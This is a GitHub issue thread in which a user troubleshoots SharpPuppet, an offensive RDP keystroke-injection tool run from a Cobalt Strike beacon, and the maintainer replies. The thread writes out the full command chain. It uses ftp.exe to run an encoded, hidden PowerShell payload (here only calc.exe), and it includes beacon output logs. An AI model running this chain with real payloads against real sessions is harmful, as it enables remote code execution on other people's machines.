### ISSUE TITLE
Unknown errors

### ISSUE THREAD

**Issue by qgrosperrin** [MadHatt3R-0x90/SharpPuppet#1]
I can't reproduce using this in my VM
`execute-assembly <path>/SharpPuppet.exe mstsc 'FULL~~DELAY 100~~GUI r~~DELAY 100~~STRING ftp.exe~~DELAY 100~~ENTER~~DELAY 500~~PASTEPAYLOAD~~DELAY 200~~MIN' 'IXBvd2Vyc2hlbGwuZXhlIC13IGhpZGRlbiAtbm9wIC1jIGNhbGMuZXhl'`

I get:
```
[+] received output:
'FULL
Input Format Is Incorrect
DELAY
[-] Invoke_3 on EntryPoint failed.
```

Any ideas ?

Using bofnet_executeassembly I get the following:
```
07/26 15:19:14 beacon> bofnet_executeassembly SharpPuppet mstsc 'FULL~~DELAY 100~~GUI r~~DELAY 100~~STRING ftp.exe~~DELAY 100~~ENTER~~DELAY 500~~PASTEPAYLOAD~~DELAY 200~~MIN' 'IXBvd2Vyc2hlbGwuZXhlIC13IGhpZGRlbiAtbm9wIC1jIGNhbGMuZXhl'
07/26 15:19:14 [*] Attempting to start .NET assembly in blocking mode
07/26 15:19:14 [+] host called home, sent: 7013 bytes
07/26 15:19:15 [+] received output:
[!] BOFNET executed but threw an unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.IndexOutOfRangeException: Index was outside the bounds of the array.
   at SimulateKeyPress.KeyWords.ProcessDuckyScript.ParseCommandArgs(String[] commands)
   at SimulateKeyPress.KeyWords.Program.Main(String[] args)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
   at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at BOFNET.Bofs.ExecuteAssembly.Go(String[] args)
   at BOFNET.Runtime.InvokeBof(Int64[] beaconApis, String bofName, Object args)

```

**Comment by MadHatt3R-0x90** [comment]
It appears that you are putting a space after the single quote before the FULL. Try it again without the space after the first quote. I just tested it and I was able to reproduce your error by adding a space before the FULL. I can update the code to strip any leading spaces to avoid this.

**Comment by MadHatt3R-0x90** [comment]
Never mind I see now that your spacing was fine. Currently it is working for me on my VM. I am trying to reproduce the issue I will let you know if I figure it out.
